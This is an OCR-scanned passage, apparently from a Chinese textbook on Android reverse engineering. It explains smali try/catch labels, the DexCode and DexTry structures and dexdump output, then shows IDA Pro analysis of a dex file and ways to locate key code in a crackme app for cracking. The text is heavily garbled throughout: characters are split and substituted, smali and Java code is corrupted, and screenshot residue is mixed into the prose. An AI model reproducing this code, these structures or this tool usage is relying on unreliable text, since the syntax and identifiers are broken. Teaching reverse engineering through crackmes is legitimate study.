const-string v5, "\u5171\u6709%d\u53ea\u9e21\u817f\uff0Oc®d 
\u4e2a\u4eba\u5e73\u5206\uffOc\u6bcf\u4eba\u53ef\u5206\u5f97%d 
\u53ea\uffOc\u8fd8\u5269\u4e0b%d\u53ea" # 格 式 化 字符 串 

const/4 V6，0x4 

new-array v6, v6, [Ljava/lang/Object; 

const/4 v7, Ox0 

.line 24 

invoke-static {pl}, Ljava/lang/Integer;->valueOf (I)Ljava/lang/Integer; 

move-result-object v8 

aput-object v8, v6, v7 

const/4 v7, 0xl1 

invoke-static {vi}, Ljava/lang/Integer;->valueOf (I)Ljava/lang/Integer; 

move-result-object v8 

aput-object v8, v6, v7 

const/4 v7, 0x2 

invoke-static {v2}, Ljava/lang/Integer;->valueOf (I)Ljava/lang/Integer; 

move-result-object v8 

aput-object v8, v6, v7 

const/4 v7, 0x3 

invoke-static {v3}, Ljava/lang/Integer;->valueOf (I)Ljava/lang/Integer; 

move-result-object v8 

aput-object v8, v6, v7 


二 323 
invoke-static {v5, v6}, Ljava/lang/string; 
->format (Ljava/lang/string; [Ljava/lang/Object;)Ljava/lang/string; 
move-result-object v4 
.line 25 
.local v4, str:Ljava/lang/SsString; 
Const/4 v5, Ox0 
invoke-static {p0, v4, v5}, Landroid/widget/Toast; 
->makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast; 
move-result-object v5 
invoke-virtual {v5}, Landroid/widget/Toast;->show()V # 使 用 Toast 显 示 格 
式 化 后 的 结果 
:try_end 1 # 第 2 个 try 结 


.Catch Ljava/lang/ArithmeticException; {:try_start_l1 .. :try_end_ 1} 
catch_0 # catch_0 

.Catch Ljava/lang/NumberFormatException; {:try_start 1 .. :try_end 1} 
cateh. 1 # catch 1 

Line :33 

.end local vil #i: 工 

.end local v2 #m: 工 

.end local v3 #n:I 

.end local v4 #str:Ljava/lang/Sstring; 

:goto_0 

return-void # 方 法 返回 

.line 26 

.restart local v1 I 

:catch 0 

move-exception v0 

.line 27 

.local v0, e:Ljava/lang/ArithmeticException; 

:try_start_ 2 # 第 3 个 try 开 始 


const-string v5, "\u4eba\u6570\u4e0d\u80fqd\u4e3a0" #“ 人 数 不 能 为 0” 
const/4 v6，0x0 
invoke-static {p0, v5, v6}, Landroid/widget/Toast; 
->makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast; 
move-result-object v5 
invoke-virtual {v5},， Landroid/widget/Toast;->show()V  # 使 用 Toast 显 示 异 
常 原因 


:try end 2 # 第 3 个 try 结 束 

.Catch Ljava/lang/NumberFormatException; {:try_start 2 .. :try_end 2} : 

catch 1 

goto :goto_0# 返 上 

.line 29 

.end local v0 #e:Ljava/lang/ArithmeticException; 

“end local v1 #1 : 工 

scatch._1 

move-exception v0 

.line 30 

.local v0, e:Ljava/lang/NumberFormatException; 

const-string v5, "\u65e0\u6548\u7684\u6570\u503c\uS5b57\u7b26\u4e32" 

#“ 无 效 的 数值 字符 串 ” 

invoke-static {p0, v5, v9}, Landroid/widget/Toast; 
->makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast; 

move-result-object v5 

invoke-virtual {v5}, Landroid/widget/Toast;->show()V  # 使 用 Toast 显 示 异 


常 原 因 
goto :goto_0# 返 世 
.end method 


整 段 代码 的 功能 比较 简单 ， 输 入 鸡腿 数 与 人 数 ， 然 后 使 用 Toast 弹 
出 鸡腿 的 分 配方 案 。 传 入 人 数 时 为 了 演示 Try/Catch 效 果 ， 使 用 了 String 
类 型 。 代 码 中 有 两 种 情况 下 会 发 生 异 常 : 第 一 种 是 将 String 类 型 转换 成 
int 类 型 时 可 能 会 发 生 NumberFormatException 异 常 ， 第 二 种 是 计算 分 配 
方法 时 除数 为 零 的 ArithmeticException 异 常 。 

代码 中 的 try 语 句 块 使 用 try_start_ 开头 的 标号 注 明 ， 以 try_end_ 开 头 
的 标号 结束 。 第 一 个 try 语 名 的 开头 标号 为 try_start_0， 结 束 标 号 为 
try_end_0。 使 用 多 个 try 语 句 块 时 标号 名 称 后 面 的 数值 依次 递增 ， 本 实例 
代码 中 最 多 使 用 到 了 try_end_2。 

在 try_end_0 标 号 下 面 使 用 “.catch” 指 令 指 定 处 理 到 的 异常 类 型 与 
catch 的 标 写 ， 格 式 如 下 。 

.Catch < 异常 类 型 > {<try 起 始 标 号 > .. <try 结 束 标 写 >}<catch 标 写 > 

查看 catch_1 标 号 处 的 代码 发 现 ， 当 转换 String 到 int 时 发 生 异 常会 弹 
出 “无 效 的 数值 字符 串 ” 的 提示 。 对 于 代码 中 的 汉字 ，baksmali 在 反 编 译 


时 将 其 使 用 Unicode 进 行 编码 ， 因 此 ， 在 阅读 前 需要 使 用 相关 的 编码 转 
换 工 具 进 行 转换 。 

仔细 阅读 代码 会 及 现在 try_end_1 标 号 下 面 使 用 “.catch” 指 令 定 义 了 
catch_0 与 catch_1 两 个 catch。catch_0 标 号 的 代码 开头 又 有 一 个 标 写 为 
try_start_2 的 try 语 句 块 ， 其 实 这 个 try 语 句 块 是 虚构 的 ， 假 如 下 面 的 代 
码 。 

private void a() { 


try { 


y cateh. (XXGS 1 


} abe CVE 二 


} 

当 执 行内 部 的 try 语 句 时 发 生 了 异常 ， 如 果 异 第 类 型 为 XXX， 则 内 
部 catch 束 会 捕捉 到 并 执行 相应 的 处 理 代码 ， 如 果 异 常 类 型 不 是 XXX， 
那么 就 会 到 外 层 的 catch 中 去 得 找 异 第 处 理 代 码 ， 这 也 就 是 为 什么 实例 的 
try_end_1 标 号 下 面 会 有 两 个 catch 的 原因 ， 男 外 ， 如 果 在 执行 XXX 异 常 
的 处 理 代码 时 又 发 生 了 异常 ， 这 个 时 候 该 怎么 办 ?此 时 这 个 异常 就 会 扩 
散 到 外 层 的 catch 中 去 ， 由 于 XXX 异 常 的 外 层 只 有 一 个 YYY 的 异常 处 
理 ， 这 时 会 判断 发 生 的 异常 是 否 为 YYY 类 型 ， 如 果 是 就 会 进行 处 理 ， 不 
是 则 抛 给 应 用 程序 。 回 到 本 实例 中 来 ， 如 果 在 执行 内 部 的 
ArithmeticException 异 稼 处理 时 再 次 发 生 别 的 异常 ， 就 会 调用 外 层 的 
catch 进 行 异 第 捕 提 ， 因 此 在 try_end_2 标 号 下 面 有 一 个 catch_1 束 很 好 理 











解 耶 吕 

在 Dalvik 指 令 集 中 ， 并 没有 与 Try/Catch 相 关 的 指令 ， 在 处 理 
Try/Catch 语 句 时 ， 是 通过 相关 的 数据 结构 来 保存 异常 信息 的 。 回 忆 一 下 
上 一 章 讲 解 dex 文 件 格 式 时 ， 曾 经 介绍 过 的 DexCode 数 据 结构 ， 它 的 声 
明 如 下 。 


struct DexCode { 
u2 registersSize;  /* 使 用 的 寄存 器 个 数 */ 








u2 insSize; /* 参数 个 数 */ 

u2 outsSize; /* 调用 其 它 方法 时 使 用 的 寄存 器 个 数 */ 
u2 triesSize; /* Try/Catch 个 数 */ 

u4 debugInfoOff; /* 指 癌 调试 信息 的 偏 移 */ 

u4 insnsSize; /* 指令 集 个 数 ， 以 2 字 节 为 单位 */ 

u2 insns[1]; /* 指令 集 */ 


/* 2 字 节 空间 用 于 结构 对 齐 */ 

/* try_item[triesSize] DexTry 结构 */ 

/* Try/Catch 中 handler 的 个 数 */ 

/* catch handler item[handlersSize] ，DexCatchHandler 结 构 */ 


Ys 
该 结构 下 面 的 try_item 就 保存 了 try 语 句 的 信息 ， 它 的 结构 DexTry 声 
明 如 下 。 
struct DexTry ({ 
u4 startaAddr; /* 起 始 地 址 */ 
u2 insnCount; /* 指令 数量 */ 
u2 handlerOff; /* handler 的 偏 移 */ 
二 


每 个 DexTry 保 存 了 try 语 句 的 起 始 地 址 和 指令 的 数量 ， 这 样 就 可 以 
计算 出 try 语 句 块 包含 的 地 址 范围 。 在 try_item 字 段 的 下 面 束 是 handler 的 
个 数 。 下 面 我 们 来 看 看 在 dex 文 件 中 存储 的 TryCatch 信 息 ， 该 实例 的 类 
个 数 较 多 ， 手 动 得 找 比较 慢 ， 在 这 里 使 用 Android SDK 中 的 dexdump 工 
有 具 ， 首 先 使 用 解压 缩 软件 取出 TryCatch.apk 中 的 classes.dex 文 件 ， 然 后 在 
命令 提示 符 下 输入 以 下 命令 : 


dexdump classes.dex > dump.txt 


打开 生成 的 dump.txt 文 件 ， 搜 索 tryCatch 可 找到 如 下 内 容 。 


#1 : (in Leom/droider/trycatch/MainActivity;) 
name "trvGCaten!' 
type : '(ILjava/lang/String;)})V' 
access : Ox0002 (PRIVATE) 
code 一 
registers i 
ins 2 
outs - 
insns size : 80 16-bit code units 
catches -| 


0x0001 - 0x0004 
Ljava/lang/NumberFormatException; -> 0x0045 

0x0005 - 0x0038 
Ljava/lang/ArithmeticException; -> 0x0039 
Ljava/lang/NumberFormatException; -> 0x0045 

0x003a - 0x0044 
Ljava/lang/NumberFormatException; -> 0x0045 


人 


从 上 面 的 输出 信息 中 ， 可 以 发 现 tryCatch0 方 法 是 私有 方法 ， 使 用 了 
13 个 寄存 器 ， 共 80 条 指令 ， 有 3 个 try 语 句 块 ， 共 有 2 个 异常 处 理 
Handler。 其 中 ，0x0001 ”- ”0x0004 为 第 一 个 try 语 句 块 的 代码 范围 ， 
tryCatch() 方 法 的 代码 位 于 0x2cb08， 因 此 计算 可 得 到 第 1 个 try 语 句 块 的 代 
码 范 围 为 : 

(Ox2cb08 + 1 * 2)~ (Ox2cb08 +4*2) = 0x2cb0a ~ 0x2cb10 

同样 可 计算 得 到 第 2 与 第 3 个 try 语 句 块 的 代码 范围 是 “0x2cb12 ~ 
0x2cb78” 与 “0x2cb7c~ ”0x2cb90”。 最 后 ， 将 这 段 smali 代 码 整理 为 Java 代 
码 如 下 。 








private void tryCatch(int drumsticks, String peple) { 
tr 二 
int i = Integer.parseInt (peple); 
ry 4 
int m = drumsticks / 1; 
int. mi = roumsticks = Mm ™ 1 
SEO St = String.formnatr 
"共有 $%q 只 鸡腿 ，g%q 个 人 平分 ， 每 人 可 分 得 sd 只 ， 还 剩 下 %q 只 "， 
drumstacksy; -Lr mM: RN}s 
Toast .makeText (MainActivity.this, str, Toast .LENGTH_SHORT) .show() ; 
} catch (ArithmeticException e) { 
Toast .makeText (MainActivity.this， "人 数 不 能 为 0"，Toast .LENGTH_ 
SHORT) .show() ; 
} 
} catch (NumberFormatException e) { 
Toast .makeText (Mainactivity.this，" 无 效 的 数值 字符 串 " ，Toast .LENGTH_ 
SHORT) .show!(); 


5.6 ”使 用 IDA Pro 静 态 分 析 Android 程 序 


IDA Pro 是 目前 全 世界 最 强大 的 静态 反 汇 编 分 析 工 具 。 它 具备 可 交 
互 、 可 编程 、 可 扩展 、 多 处 理 器 文 持 等 众多 特点 。 使 用 IDA Pro 来 静态 
分 析 程 序 是 一 门 大 学 问 ， 关 于 它 的 完整 功能 与 使 用 方法 ， 绝 不 是 本 书 一 
到 两 节 的 内 容 就 可 以 阐述 清楚 的 ， 如 果 读 者 对 IDA Pro 不 了 解 或 者 没有 
使 用 过 该 软件 ， 请 读者 先 查 看 相关 的 技术 书籍 来 掌握 基本 的 使 用 方法 ， 
推荐 阅读 《IDA Pro 权 威 指南 〈 第 2 版 ) 》。 











5.6.1 IDA Pro 对 Android 的 支持 





IDA Pro 从 6.1 版 本 开始 ， 提 供 了 对 Android 的 静态 分 析 与 动态 调试 文 
持 。 包 括 Dalvik 指 令 集 的 反 汇编 、 原 生 库 (ARM/Thumb 代 码 ) 的 反 汇 
编 、 原 生 库 ARM/Thumb 代 码 ) 的 动态 调试 等 。 具 体 可 查看 IDA Pro 官 
方 的 更 新 日 志 ， 链 接 如 下 : http://www.hex- 


rays.COm/products/ida/6.LUindex.shtml。 





VN 
壮 瓦 





IDA Pro 是 商业 收费 软件 ， 而 且 价 格 不 菲 。 本 节 在 对 反 汇 编 代码 进行 演示 与 讲解 时 ， 假 定 读 
者 已 经 通过 正规 渠道 获得 了 IDA Pro 6.1 或 更 高 版 本 的 使 用 授权 ， 并 且 已 经 安装 配置 好 IDA Pro 软 
件 。 笔 者 在 编写 本 章 时 IDA Pro 最 新 版 本 为 6.3， 本 书 讲解 时 使 用 了 IDA Pro 6.1。 


















































5.6.2 ”如 何 操作 


以 5.2 节 的 crackme0502.apk 为 例 ， 首 先 解压 出 classes.dex 文 件 ， 然 后 
打开 IDA Pro， 将 classes.dex 拖 放 到 IDA Pro 的 主 窗口 ， 会 弹出 加 载 新 文 


件 对 话 框 ， 如 图 5-4 所 示 ，IDA Pro 解 析出 了 该 文件 属于 “Android DEX 
File”， 保 持 默 认 的 选项 ， 点 击 OK 按 钮 ， 稍 等 片刻 IDA ”Pro 就 会 分 析 完 
dex 文 件 。 


Load a new file 


Load file D:\workspace\chapter5\5.6\5.6.2\classes. dex as 
[Android DEXY file version 53.0 [dex. ldw] | 


| Binary file 








Processor type 


Intel 80x86 processors; metapc v 


Analysis 


Loading segment |Dx00000000 





Enabled 
Loading offset |0x00000000 | Indicator enabled 





segments 
天 | Load resources 
Rename DLL entries 
口 Narual load 
Fill] seement gaps 
加 Loading options 
Create FLAT eroup 





DLL directory |C: ‘WINDOWS 


图 5-4 使 用 IDA Pro 加 载 classes.dex 文 件 





IDA Pro 支持 结构 化 形式 显示 数据 结构 ， 因 此 ， 我 们 有 必要 先 整理 
一 下 反 汇 编 后 的 数据 。dex 文 件 的 数据 结构 大 部 分 在 Android 系 统 源码 中 
dalvik\ibdex\DexFile.h 文 件 中 ， 笔 者 将 其 中 的 结构 整理 为 dex.idc 脚 本 ， 











在 分 析 dex 文 件 时 直接 导入 即 可 使 用 。 导 入 的 方法 为 点 击 IDA Pro 的 染 单 
项 “File Script ”fe”， 然 后 选择 dex.idc 即 可 。 点 击 IDA ”Pro 主 界面 的 
Structures 选 项 卡 ， 如 网 5-5 所 示 。 





Vchapter5\5, 6\ ELAaaseE。 了 ez 

Eile Edit Jomp Search Yier fptions Windows }slp 

A Sr I a) 于 时 各 
| Funetions vindov 本 Imvierh 加 | 回 jervierh 目 | 四 Struetwes 回 | 国 kms 了 | 确 Iaports 园 」 图。 Perts | 
| Function name R00000000 # Ins/Del : create/delete structure ~ 
[月 AecessibilityServiceInEoConpat$Aces=)00000000 # D/A/* : Create Structure member (data/ascii/array) | 
Lf| MecessibilityServicalnEdConpat$Acet O0000000 # N : rename structure or structure membel 
加 AccessibilityServiceInfoCompat$kees | WOWBSNON HU : delete structdre member 
fF) AccessibilitySeryicalnEoConpat$Aces | RNDOanN 站 [990999619 BYTES- COLLAPSED STRUCT DexMapList- PRESS KEYPAD “+" TO EXPAND] 
LW MecessibilityServicelnE conpat$Acer B8800086 [8888880C BYTES. COLLAPSED STRUCT Dextlapltem,. PRESS KEYPAD * TO EXPAND] 





fF| hccewnsibilitySorvicalnfoCompat$Aces [USE 
局 人 AccessibilitySerwvicaInEforompatSkcey QU006BB900 
fF| keeessibilitySerwiceInfoConpat$kecf | NGG980N 
F] AccesgibilitySwrviceaInEoconpat$Accy D00000000 
f| AcecessibilityServiceInfoConpat$Aces 和 名 人 人 和 人 和 
] AccessibilityServiceInEoConpatdhcer 88909898 
月 AccessibilityServiceInEoComput$Aces | 9669068 
00689980 
ebpn9909 


[ep899694 BYTES. COLLAPSED STRUCT DexStringId。PRESS KEYPAD 
[eeege698 BYTES. COLLAPSED STRUCT DexFieldid。PRESS KEYPAD * 


TO EXPAND] 

" TO EXPAND] 
[88888882 BYTES. COLLAPSED STRUCT DexhnnotationItem- PRESS KEYPAD "+" TO EXPAND] 
[99690098 BYTES. COLLAPSED STRUCT DexTypeld. PRESS KEYPAD +" TO EXPAND] 
[B8800088 BYTES. COLLAPSED STRUCT DexClasslLookup. PRESS KEYPAD “+” TO EXPAND] 
[99899828 BYTES. COLLAPSED STRUCT DexOptHeader. PRESS KEYPhD “+*"” TO EXPAND] 
[8880804 BYTES. COLLAPSED STRUCT DexAnnotationSetRefltem. PRESS KEYPAD "+" TO EXPAND] 
[9006886998 BYTES. COLLAPSED STRUCT DexAnnotationSetlitem. PRESS KEYPAD “+" TO EXPAND] 
[888868881 BYTES COLLAPSED STRUCT DexEncodedArray. PRESS KEYPAD “+ TO EXPAND] 














BNW96Daas # [00666808 BYTES. COLLAPSED STRUCT DexParaneterhnnotationsItem- PRESS KEYPAD "+*" TO EXPRND] 

* TO EXPAND] 

局 MecessibilityServiceInfoConpat sett | 80909980 [08008898868 BYTES. COLLAPSED STRUCT DexFieldhnnotationsIten。PRESS KEYPAD "+*” TO EXPAND] 
heeessibilityServiceInEoConpat_setl | 090BB9nN # [99999619 BYTES. COLLAPSED STRUCT DexAnnotationsDirectoryltem. PRESS KEYPAD “+*" TO EXPAND] 


| hccossibilityServicaInEoCompat_ eat] MNONANON tH [O800801 BYTES. COLLAPSED STRUCT DexLink-。 PRESS KEYPAD “+” TO EXPAND] 
[O00600008 BYTES. COLLAPSED STRUCT DexTry. PRESS KEYPAD T0 EXPAND] 
[888888614 BYTES. COLLAPSED STRUCT DexCode. PRESS KEYPAD * TO EXPAND] 


[96866698 BYTES. COLLAPSED STRUCT DexTypeList. PRESS KEYPAD "+" TO EXPAND] 





了 | AccessibilityServicelnEoConpat_cetl Oooo00 
四 AccessibilityServiceInfoConpat eett | BGSDBBDD 
下 | AccessibilitySwerwiceInEoconpatIcs_ 609000000 
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莫 
LL 
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hecessibilitySeurvicaInfoConpat A | WONDO # [O0000008 BYTES. COLLAPSED STRUCT DexMethodAnnotationsltem. PRESS KEYPAD 
革 
共 
LL 
3 
La 
3 
3 
# 
亲 
站 
LB 
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于 | AceessibilityServicelnfoConpatIcs_s NIDnWNSN # 【999988082 BYTES. COLLAPSED STRUCT DexTypeltem. PRESS KEYPAD “+"™ TO EXPAND] 

Lf) MccessibilityServicslInEoConpatles_t | 00099900 [900080002 BYTES. COLLAPSED STRUCT DexClassDef. PRESS KEYPAD * TO EXPAND] 

If) AceceessibilityServiceInEfocompatTcs : |888090988 [998989B85 BYTES. COLLAPSED STRUCT DexProtold. PRESS KEYPAD 和 TO EXPAND] 

[Ff) AecessibilityServicelInfoConpatIes_ 1 | ODN [8800068 BYTES COLLAPSED STRUCT DexiMethodld. PRESS KEYPAD “+” TO EXPAND] 

区 icesssibilitySeryicaInfoconpatIcs_i 8086099800 [888680888 BYTES. COLLAPSED STRUCT DexAnnotationSetReflist. PRESS KEYPAD "+" TO EXPAND] 
ContextCompat_ init ey 记 | 098089800 [S88888790 BYTES. COLLAPSED STRUCT DexHeader - PRESS KEYPAD “+” TO EXPAND] 

< 


| 2. Dexiapiten:0000 
司 oatput window 可 


le tooia\ 玫 考分 析 \ida61\idc 
n "OnLoad’... 


>» x*|« 













file right now. 





(derauit, 


30: idle Down 





图 5-5 ”导入 dex.idc 


点 击 IDA View-A 选 项 卡 ， 回 到 反 汇 编 代 码 界 面 ， 然 后 点 击 沫 单 
项 “Jump Jump to address”， 或 者 按 下 快捷 键 G， 弹 出 地 址 跳 转 对 话 
框 ， 输 入 0 让 IDA Pro 跳 转 到 dex 文 件 开 头 。 将 鼠标 定位 到 注释 “# Segment 
type: Pure data" 所 在 的 行 ， 然 后 点 击 沫 单项 “Edit -> Structs » Struct var”， 
或 者 按 下 快捷 键 ALT+Q， 弹 出 选择 结构 类 型 对 话 框 ， 如 图 5-6 所 示 ， 选 
择 DexHeader 后 点 击 OK 按 钮 返回 。 


WB Choose a structure type 


Hame 

[| DexMapLi st 

加 DexllapIt em 

[局 DexStringId 

加 DexFieldId 

| Dexhnmotatlonltem 

[| DexTypeld 

[| DexClassLookup 

Ey Dex0ptHeader 

[ 册 ] DexhrnotationSetRefIltem 

Ey DexhnnotationSetItem 

| 有 | DexEncodedArray 

Ey DexParameterAnnotationsItem 
加 DexMethodArmnotati onsIt em 
Ey DexFieldhinnotationsItem 

[有 | DexAmnrnotatiorsDirectoryItenm 
A| DexLink 

[有 DexTry 

[A DexCode 

Ey DexTypeList 

[ 琴 | DexTypeltem 

[有 | DexClassDef 

[a| DexProtold 

[A| DexMethodId 

Ey DexAnnotationSetRefList 

FJ DexlHeader 0070 


Line 25 of 25 








图 5-6 ”选择 结构 类 型 
此 时 ，dex 文 件 开 头 的 0x70 个 字 节 就 会 格式 化 显示 ， 效 果 如 图 5-7 所 


示 。 同 样 ， 读 者 可 以 手动 对 dex 文 件 中 其 它 的 结构 进行 整理 ， 如 
DexHeader 下 面 的 DexStringId 结 构 。 





HEADER 





段 ， 
出 。 


:69660888 并 SegrknE tupe: 
HERDER : 
HEADER: 
HEADER : 
HEADER: 
HEADER: 
HEADER : 
HEADER: 
HEADER: 
HEADER: 
HEADER: 
HEADER: 
HEADER: 
HEADER : 
HEADER: 
HEADER: 
HEADER : 
HEADER : 
HEADER : 
HEADER : 
HEADER : 
HEADER: 
HEADER: 
HEADER: 
HEADER : 
HEADER : 
HEADER : 
HEADER : 


6906008860 stru 8: 
0866890 
680696699 
6969699969 
89699699 
8608699908 
89699099 
89686660880 
68686660866 
69686880 
60668680 
690866860 
69086608660 
a0860860 
86066868660 
69880860 
60686869660 
68808866866 
99699999 
08080060900 
890999999 
9986860866 
69660000 
6896608660 
6068866660 
89669669 
89999998 


点 击 菜单 项 <Jump ~ Jump to segment”， 
弹出 段 选择 对 话 框 ， 如 图 5-8 所 示 ，IDA 

其 中 前 7 个 段 由 DexHeader 结 
仔细 得 看 段 名 ， 可 以 发 现 IDA 


Pure data 


-byte Bx64, Ox65, 


-int Gx3518E66f 


9x78 ， 


BxA, x38, Bx33, Bx35, @# magic 

# DATA XREF: AccessibilityServiceInfoCompat$Accessibi 
# AccessibilityServiceInfoCompat$AccessibilityService 
# checksum 


-byte Bx35, BxE7, 5, Gx206, Gx75, Gx16, Gx5E, GxA8, Gx2E# signature 
-byte BxE5, Bx27, GxB8, GxB9, GxFC, GxD9, Bx2F, Bx17, 5# signature 
-byte GxAF, 8xBA 共 signature 
-int Gx4F42C # fileSize 

-int Bx706 # headerSize 
-int Bx12345678 # endianTag 
-int 6 # 1inkSize 

-int 0 提 Link0ff 

-int Bx4F35C # mapOff 

-int BxE56 # stringIdsSize 
-int Gx70 共 stringIds0ff 
-int 9x219 # tupeIdsSize 
-int Bx39C8 共 tupeIds0ff 
-int 6x2B3 # protoIdsSize 
-Int Gx4288 划 protoldsOff 
-int Gx2E9 # fieldIdsSize 
-int Gx626C 共 fieldIds0ff 
-int GxC54 # methodIdsSize 
-int Gx79B4 划 methodIds0ff 
-int Gx127 # ClassDefsSize 
-int GxDC54 # classDefsOff 
-int Gx3F2F8 并 datasize 

-int Gx16134 共 data0ff 


图 5-7 格式 化 后 的 DexHeader 结 


a 笔者 觉 禹 


们 不 得 而 知 ， 不 过 ， 我 们 需要 知道 


还 有 第 


和 6 个 段 改名 为 CLASSDEFS 更 好 ， 


构 


或 者 按 下 快捷 键 CTRL+S， 
Pro 将 dex 文 件 一 共 分 成 了 9 个 


构 给 出 ， 最 后 2 个 段 可 以 通过 计算 得 





Pro 对 其 命名 不 是 很 好 ， 有 3 个 
导 第 3 个 段 改 名 为 PROTOS 更 合适 一 
IDA ”Pro 为 什么 这 样 命名 我 


首 每 个 段 具 体 所 代表 的 含义 。 










HERDER:88668898 # stringIdsSize 
|HERDER: 88696699 # StringIds0ff 
HEADER: 96696668 # tupeIdsSize 
HEhRDER :8989966898 划 上 upeIds0ff 
HEADER: 88860809889 # protoIdsSize 
HERDER :896899898 i Bx42868 # protoIds0ff 
HEADER :98968988988 i Bx2E9 # fieldIdsSize 
HEADER: 89866868888 i Bx626C # fieldIds0ff 
HEADER :86866866060 i 8xC54 # methodIdsSize 
IHEADER : 8866866608 i Bx79B4 # methodIds0ff 
HERDER: 869868988 i Bx127 # classDefsSize 
HEADER: 68686866688 i GxDC54 划 classDefs0ff 
HERDER :8686666688 i 6x3F2F8 # dataSize 
HEADER:8886886886 i Bx18134 # data0ff 
HEADER: 9968666678 DexStringld <8x2F9C8> 


IHEADE - 
HEAD 3 Choose segnment to Juap 







el 
















IHEADE| 了 L 

HEADE| 00000000 000039C8 0 L byte 0000 public FFFF…- 
IHEADEN | 000039C8 00004208 得 党 史 L byte O000 public DATA 32 FFFF": 
IHEADEN | 00004208 0000626C 避 过 过 L byte 0000 public DATA 32 FFFF"*: 
HEADE 0000826C 000079B4 党 向 汐 L byte 0000 public DATA 32 FFFF: 
IHEADE| O000T9B4 0000DC54 衣 二 二 L byte 0000 public DATA 32 FFFF**: 
HEADEN fa 0000DC54 00010134 第 全 这 L byte 0000 public DATA 32 FFFF**: 
HEADEN ls 00010134 0002F9C8 划一 L byte D000 publiec DATA 32 了 FFF… 
HEADE| 0002F9C8 000423DT 闽 志 - 谊 L byte 0000 public LATA 32 FFFF"*: 
HEADE| 00042307 0004F42C 蔓 党 伟 L byte 0000 public DATA 32 FFFF*: 











HEADE| 
< 





Line 1 of 9 


图 5-8 dex 文 件 的 9 个 段 


dex 文 件 中 所 有 方法 可 以 点 击 Exports 选 项 卡 查看 。 方 法 的 命名 规则 





为 “类 名 .， 方法 名 @ 方法 声明 ”。 在 Exports 选 项 卡 中 随便 选择 一 项 ， 如 
SimpleCursorAdapter.swapCursor@LL， 然 后 双击 跳 转 到 相应 的 反 汇 编 代 
码 人 处， 该 处 的 代码 如 下 。 


CODE :0002CFCC Method 2589 (0xald): 
CODE :0002CFCC public android.database.Cursor 


CODE :0002CFCC android.support .v4 .widget .SimpleCursorAdapter .swapCursor( 

CODE:0002CFCC android.database.Cursor p0) # 方 法 声明 

CODE: 0002CFCC this = v2  #this3 引 用 

CODE: 0002CFCC p0 = v3 # 第 一 个 参数 

CODE: 0002CFCC invoke-super {this, p0}, <ref ResourceCursorAdapter. 
swapCursor (ref) imp. @ _def ResourceCursorAdapter_ 
swapCursor@LL> 

CODE :0002CFD2 move-result-object v0 

CODE :0002CFD4 iget-object vl, this, SimpleCursorAdapter_mOriginalFrom 

CODE: 0002CFD8 invoke-direct {this, vl}, <void SimpleCursorAdapter. 


findColumns (ref) SimpleCursorAdapter_findColumns@VL> 
CODE :0002CFDE 
CODE :0002CFDE locret: 
CODE: 0002CFDE return-object v0 
CODE: 0002CFDE Method End 


IDA Pro 的 反 汇 编 代 码 使 用 ref 关 键 字 来 表示 非 Java 标 准 类 型 的 引 
用 ， 如 方法 第 1 行 的 invoke-super 指 令 的 前 半 部 分 如 下 。 


invoke-super {this, p0}, <ref ResourceCursorAdapter.swapCursor (ref) 


前 面 的 ref 是 swapCursor0) 方 法 的 返回 类 型 ， 后 面 括号 中 的 ref 是 参数 
类 型 。 

后 半 部 分 的 代码 是 IDA Pro 乔 能 识别 的 。IDA Pro 能 智能 识别 Android 
SDK 的 API 函 数 并 使 用 imp 关 键 字 标识 出 来 ， 如 第 1 行 的 invoke-super 指 令 
的 后 半 部 分 如 下 。 

imp. @ _def ResourceCursorAdapter_swapCursor@LL 

imp 表 明 该 方法 为 Android SDK 中 的 API，@ 后 面 的 部 分 为 API 的 声 
明 ， 类 名 与 方法 名 之 间 使 用 下 划 线 分 隔 。 

IDA Pro 能 识别 隐 式 传递 过 来 的 this 引 用 ， 在 smali 语 法 中 ， 使 用 p0 寄 
存 器 传递 this 指 针 ， 此 处 由 于 this 取 代 了 p0， 所 以 后 面 的 寄存 器 命名 都 依 
次 减 了 1。 

IDA Pro 能 识别 代码 中 的 循环 、switch 分 支 与 Try/Catch 结 构 ， 并 能 将 
它们 以 类 似 高 级 语言 的 结构 形式 显示 出 来 ， 这 在 分 析 大 型 程序 时 对 了 解 
代码 结构 有 很 大 的 帮助 。 有 具体 的 代码 反 汇 编 效 果 读 者 可 以 打开 5.2 节 使 








用 到 的 SwitchCase.apk 与 TryCatch.apk 的 classes.dex 文 件 自行 查看 。 


5.6.3 ”定位 关键 代码 一 ”使 用 IDA Pro 进 行 破解 的 
实例 


使 用 IDA ”Pro 定 位 关键 代码 的 方法 整体 上 与 定位 smali 关 键 代 人 码 差 不 
多 。 

第 一 种 方法 是 搜索 特征 字符 串 。 首 先 按 下 快捷 键 CTRL+S 打 开 段 选 
择 对 话 框 ， 双 击 STRINGS 段 跳 转 到 字符 串 段 ， 然 后 点 击 沫 单 
项 “Search -text”， 或 者 按 下 快捷 键 ALT+T， 打 开 文 本 搜索 对 话 框 ， 在 
String 和 劳 边 的 文本 框 中 输入 要 搜索 的 字符 串 后 点 击 OK 按 钮 ， 稍 等 片刻 束 
会 定位 到 搜索 结果 。 不 过 目前 IDA Pro 对 中 文字 符 串 的 显示 与 搜索 都 不 
支持 ， 如 有 果 字 符 串 中 的 中 文字 符 显 示 为 乱码 ， 需 要 编号 相关 的 字符 串 处 
理 插 件 来 解决 ， 这 个 工作 就 交 给 恋 者 去 完成 了 。 

第 二 种 方法 是 搜索 关键 API。 首 先 按 下 快捷 键 CTRL+S 打 开 段 选择 
对 话 框 ， 双 击 第 一 个 CODE 段 跳 转 到 数据 起 始 段 ， 然 后 点 击 沫 单 
项 “Search -text”， 或 者 按 下 快捷 键 ALT+T， 打 开 文 本 搜索 对 话 框 ， 在 
String 劳 边 的 文本 框 中 输入 要 搜索 的 API 名 称 后 点 击 OK 按 钮 ， 稍 等 片刻 
就 会 定位 到 搜索 结果 。 如 果 API 被 调用 多 次 ， 可 以 按 下 快捷 键 CTRL+T 
来 搜索 下 一 项 。 

第 三 种 方法 是 通过 方法 名 来 判断 方法 的 功能 。 这 种 办 法 比较 罕 拙 ， 
对 于 混 消 过 的 代码 ， 定 位 关键 代码 比较 困难 。 比 如 ， 我 们 知道 
crackme0502.apk 程 序 的 主 Activity 类 为 MainActivity， 于 是 在 Exports 选 项 
卡 页 面 上 输入 Main， 代 码 会 自动 定位 到 以 Main 开 头 的 所 在 行 ， 如 图 5-9 
